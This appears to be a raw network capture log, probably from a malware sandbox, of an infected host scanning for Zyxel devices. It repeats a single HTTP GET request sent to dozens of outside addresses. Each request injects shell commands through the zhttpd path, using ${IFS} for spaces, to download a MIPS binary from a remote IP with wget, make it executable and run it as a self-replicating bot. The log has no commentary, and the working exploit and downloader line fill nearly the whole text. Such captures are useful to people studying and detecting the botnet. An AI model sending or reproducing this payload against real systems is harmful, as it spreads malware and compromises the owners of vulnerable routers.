                                      Jan 14, 2024 15:50:58.574615955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7336192.168.2.145710819.143.243.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.574660063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7337192.168.2.1452712112.77.66.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.574692965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7338192.168.2.145453053.68.3.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.574733973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7339192.168.2.1434468125.114.0.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.574779034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7340192.168.2.1445304170.57.253.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.574834108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7341192.168.2.1455816189.218.29.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.574861050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7342192.168.2.145013019.94.245.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.574917078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7343192.168.2.144374480.141.254.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.574987888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7344192.168.2.144723693.152.106.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.574995041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7345192.168.2.143767239.80.206.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.575023890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7346192.168.2.1445676116.113.16.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.575078964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7347192.168.2.1441656213.74.54.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.575123072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7348192.168.2.144655681.81.215.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.575158119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7349192.168.2.145325462.86.55.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.575182915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7350192.168.2.144671459.51.54.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.575200081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7351192.168.2.144647445.163.195.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.575263977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7352192.168.2.143723095.55.180.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.575298071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7353192.168.2.1460166219.238.202.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.575346947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7354192.168.2.1454084124.58.231.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.575388908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7355192.168.2.1447250190.120.150.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.575427055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7356192.168.2.143894250.127.16.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.575459957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7357192.168.2.1448468151.153.74.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.575499058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7358192.168.2.1453448156.16.158.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.575550079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7359192.168.2.1434126155.24.130.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.575606108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7360192.168.2.1433956167.167.100.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.575640917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7361192.168.2.145998223.93.120.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.575668097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7362192.168.2.1437766189.216.30.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.575695038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7363192.168.2.1439974186.35.161.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.575757027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7364192.168.2.1456442187.22.51.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.575778961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7365192.168.2.145793617.141.95.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.575829983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7366192.168.2.1434982144.201.215.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.575854063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7367192.168.2.145535085.158.230.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.575897932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7368192.168.2.1439524175.165.174.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.575948000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7369192.168.2.1443512126.170.35.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.575990915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7370192.168.2.1440954180.116.44.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.576020002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7371192.168.2.1441916140.190.252.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.576056004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7372192.168.2.144818668.251.220.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.576102972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7373192.168.2.1450164194.113.203.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.576143980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7374192.168.2.1450430145.87.15.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.576174974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7375192.168.2.144867045.243.238.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.576201916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7376192.168.2.143386050.111.128.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.576225042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7377192.168.2.1449234135.114.187.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.576288939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7378192.168.2.1436154131.45.175.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.576339006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7379192.168.2.1433402136.174.62.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.576364040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7380192.168.2.144117659.237.191.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.576415062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7381192.168.2.144746653.79.40.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.576443911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7382192.168.2.144169472.17.193.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.576472044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7383192.168.2.1448718222.232.64.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.576498032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7384192.168.2.1458620178.153.196.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.576550961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7385192.168.2.1437348181.103.1.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.576606035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7386192.168.2.143610646.48.168.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.576642036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7387192.168.2.144919454.252.39.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.576728106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7388192.168.2.1444852177.105.173.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.576786995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7389192.168.2.1451382150.159.149.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.576819897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7390192.168.2.144594018.52.221.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.576867104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7391192.168.2.1442876103.101.20.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.576921940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7392192.168.2.145874841.133.223.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.576962948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7393192.168.2.143954267.193.238.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.577016115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7394192.168.2.1437190195.111.135.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.577034950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7395192.168.2.1439478118.105.179.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.577063084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7396192.168.2.1457928129.200.235.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.577116966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7397192.168.2.1438612106.117.74.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.577169895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7398192.168.2.1440876141.252.248.207443
                                      TimestampBytes transferredDirectionData
